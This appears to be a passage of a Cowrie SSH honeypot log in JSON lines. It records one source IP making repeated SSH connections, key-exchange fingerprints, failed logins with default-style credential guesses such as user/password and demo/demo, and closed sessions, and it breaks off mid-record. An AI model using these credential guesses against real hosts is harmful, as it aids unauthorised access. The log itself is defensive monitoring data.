{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:10:45.858783Z","src_ip":"212.227.235.229","session":"1777aeae245f"}
{"eventid":"cowrie.login.failed","username":"cpanel","password":"72b1bd75ac87852a","message":"login attempt [cpanel/72b1bd75ac87852a] failed","sensor":"my-vps","timestamp":"2025-08-28T08:10:46.614206Z","src_ip":"212.227.235.229","session":"1777aeae245f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:10:47.935797Z","src_ip":"212.227.235.229","session":"1777aeae245f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46132,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf0dcd385546","protocol":"ssh","message":"New connection: 212.227.235.229:46132 (1.2.3.4:22) [session: cf0dcd385546]","sensor":"my-vps","timestamp":"2025-08-28T08:11:00.042468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:00.083651Z","src_ip":"212.227.235.229","session":"cf0dcd385546"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:00.318954Z","src_ip":"212.227.235.229","session":"cf0dcd385546"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59392,"dst_ip":"1.2.3.4","dst_port":22,"session":"bba2a9a5c48b","protocol":"ssh","message":"New connection: 212.227.235.229:59392 (1.2.3.4:22) [session: bba2a9a5c48b]","sensor":"my-vps","timestamp":"2025-08-28T08:11:01.656921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:01.839672Z","src_ip":"212.227.235.229","session":"bba2a9a5c48b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:01.924621Z","src_ip":"212.227.235.229","session":"bba2a9a5c48b"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-28T08:11:02.691225Z","src_ip":"212.227.235.229","session":"cf0dcd385546"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:11:03.940936Z","src_ip":"212.227.235.229","session":"cf0dcd385546"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59408,"dst_ip":"1.2.3.4","dst_port":22,"session":"26e2efc6d7c9","protocol":"ssh","message":"New connection: 212.227.235.229:59408 (1.2.3.4:22) [session: 26e2efc6d7c9]","sensor":"my-vps","timestamp":"2025-08-28T08:11:05.163554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:05.216410Z","src_ip":"212.227.235.229","session":"26e2efc6d7c9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:05.413378Z","src_ip":"212.227.235.229","session":"26e2efc6d7c9"}
{"eventid":"cowrie.login.failed","username":"install","password":"install","message":"login attempt [install/install] failed","sensor":"my-vps","timestamp":"2025-08-28T08:11:06.759083Z","src_ip":"212.227.235.229","session":"bba2a9a5c48b"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:11:09.845052Z","src_ip":"212.227.235.229","session":"bba2a9a5c48b"}
{"eventid":"cowrie.login.failed","username":"proftpd","password":"proftpd","message":"login attempt [proftpd/proftpd] failed","sensor":"my-vps","timestamp":"2025-08-28T08:11:10.939644Z","src_ip":"212.227.235.229","session":"26e2efc6d7c9"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:11:12.476216Z","src_ip":"212.227.235.229","session":"26e2efc6d7c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51920,"dst_ip":"1.2.3.4","dst_port":22,"session":"49d1e285162f","protocol":"ssh","message":"New connection: 212.227.235.229:51920 (1.2.3.4:22) [session: 49d1e285162f]","sensor":"my-vps","timestamp":"2025-08-28T08:11:19.766333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:20.346205Z","src_ip":"212.227.235.229","session":"49d1e285162f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:20.424084Z","src_ip":"212.227.235.229","session":"49d1e285162f"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T08:11:23.049001Z","src_ip":"212.227.235.229","session":"49d1e285162f"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:11:24.361400Z","src_ip":"212.227.235.229","session":"49d1e285162f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50814,"dst_ip":"1.2.3.4","dst_port":22,"session":"2570dc6aff10","protocol":"ssh","message":"New connection: 212.227.235.229:50814 (1.2.3.4:22) [session: 2570dc6aff10]","sensor":"my-vps","timestamp":"2025-08-28T08:11:25.834171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:25.870116Z","src_ip":"212.227.235.229","session":"2570dc6aff10"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:26.344433Z","src_ip":"212.227.235.229","session":"2570dc6aff10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50822,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f67ca673772","protocol":"ssh","message":"New connection: 212.227.235.229:50822 (1.2.3.4:22) [session: 2f67ca673772]","sensor":"my-vps","timestamp":"2025-08-28T08:11:28.147729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:28.561221Z","src_ip":"212.227.235.229","session":"2f67ca673772"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib